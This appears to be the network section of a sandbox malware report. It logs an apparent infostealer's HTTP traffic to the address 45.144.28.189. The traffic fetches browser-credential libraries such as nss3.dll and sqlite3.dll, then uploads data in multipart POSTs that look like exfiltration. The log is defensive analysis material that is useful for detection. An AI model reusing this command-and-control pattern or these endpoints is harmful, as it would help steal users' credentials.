Network Analysis

GET /analytics.php?pub=a03&guid=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&sign=178004f0465ebfb5 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: none sec-fetch-user: ?1 upgrade-insecure-requests: 1 Host: 14mmf.za.com

POST / HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: GunnaWunnaBlueTips Host: 45.144.28.189 Content-Length: 95 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 May 2023 00:10:28 GMT Content-Type: text/html; charset=utf-8 Content-Length: 7200 Connection: keep-alive Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin X-DNS-Prefetch-Control: off Expect-CT: max-age=0 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff Origin-Agent-Cluster: ?1 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: no-referrer X-XSS-Protection: 0 ETag: W/"1c20-UdDRW84DPcJWX+s1RM5uo4GP178"

GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1 Content-Type: text/plain; User-Agent: GunnaWunnaBlueTips Host: 45.144.28.189 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 May 2023 00:10:28 GMT Content-Type: application/octet-stream Content-Length: 2042296 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 19:39:48 GMT ETag: "62548404-1f29b8" Expires: Wed, 24 May 2023 00:40:28 GMT Cache-Control: max-age=1800 Cache-Control: public Accept-Ranges: bytes

GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1 Content-Type: text/plain; User-Agent: GunnaWunnaBlueTips Host: 45.144.28.189 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 May 2023 00:10:31 GMT Content-Type: application/octet-stream Content-Length: 449280 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 19:39:42 GMT ETag: "625483fe-6db00" Expires: Wed, 24 May 2023 00:40:31 GMT Cache-Control: max-age=1800 Cache-Control: public Accept-Ranges: bytes

GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1 Content-Type: text/plain; User-Agent: GunnaWunnaBlueTips Host: 45.144.28.189 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 May 2023 00:10:33 GMT Content-Type: application/octet-stream Content-Length: 80128 Connection: keep-alive Last-Modified: Sat, 28 May 2022 21:52:46 GMT ETag: "629299ae-13900" Expires: Wed, 24 May 2023 00:40:33 GMT Cache-Control: max-age=1800 Cache-Control: public Accept-Ranges: bytes

GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1 Content-Type: text/plain; User-Agent: GunnaWunnaBlueTips Host: 45.144.28.189 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 May 2023 00:10:33 GMT Content-Type: application/octet-stream Content-Length: 627128 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 19:39:36 GMT ETag: "625483f8-991b8" Expires: Wed, 24 May 2023 00:40:33 GMT Cache-Control: max-age=1800 Cache-Control: public Accept-Ranges: bytes

GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1 Content-Type: text/plain; User-Agent: GunnaWunnaBlueTips Host: 45.144.28.189 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 May 2023 00:10:34 GMT Content-Type: application/octet-stream Content-Length: 684984 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 19:40:08 GMT ETag: "62548418-a73b8" Expires: Wed, 24 May 2023 00:40:34 GMT Cache-Control: max-age=1800 Cache-Control: public Accept-Ranges: bytes

GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1 Content-Type: text/plain; User-Agent: GunnaWunnaBlueTips Host: 45.144.28.189 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 May 2023 00:10:35 GMT Content-Type: application/octet-stream Content-Length: 254392 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 19:39:58 GMT ETag: "6254840e-3e1b8" Expires: Wed, 24 May 2023 00:40:35 GMT Cache-Control: max-age=1800 Cache-Control: public Accept-Ranges: bytes

GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1 Content-Type: text/plain; User-Agent: GunnaWunnaBlueTips Host: 45.144.28.189 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 May 2023 00:10:35 GMT Content-Type: application/octet-stream Content-Length: 1099223 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 17:28:56 GMT ETag: "62546558-10c5d7" Expires: Wed, 24 May 2023 00:40:35 GMT Cache-Control: max-age=1800 Cache-Control: public Accept-Ranges: bytes

POST /302f831c3b8545fb0a5a60bd7a5eeedb HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=r145gaeE5kwsNWn9 User-Agent: GunnaWunnaBlueTips Host: 45.144.28.189 Content-Length: 2810 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 May 2023 00:10:36 GMT Content-Type: text/html; charset=utf-8 Content-Length: 8 Connection: keep-alive Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin X-DNS-Prefetch-Control: off Expect-CT: max-age=0 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff Origin-Agent-Cluster: ?1 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: no-referrer X-XSS-Protection: 0 ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"

POST /302f831c3b8545fb0a5a60bd7a5eeedb HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=WpSmDEj36srOTJxv User-Agent: GunnaWunnaBlueTips Host: 45.144.28.189 Content-Length: 589 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 May 2023 00:10:37 GMT Content-Type: text/html; charset=utf-8 Content-Length: 8 Connection: keep-alive Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin X-DNS-Prefetch-Control: off Expect-CT: max-age=0 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff Origin-Agent-Cluster: ?1 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: no-referrer X-XSS-Protection: 0 ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"

POST /302f831c3b8545fb0a5a60bd7a5eeedb HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=m0cx80p5GmdrtM7F User-Agent: GunnaWunnaBlueTips Host: 45.144.28.189 Content-Length: 89398 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 May 2023 00:10:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 8 Connection: keep-alive Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin X-DNS-Prefetch-Control: off Expect-CT: max-age=0 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff Origin-Agent-Cluster: ?1 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: no-referrer X-XSS-Protection: 0 ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"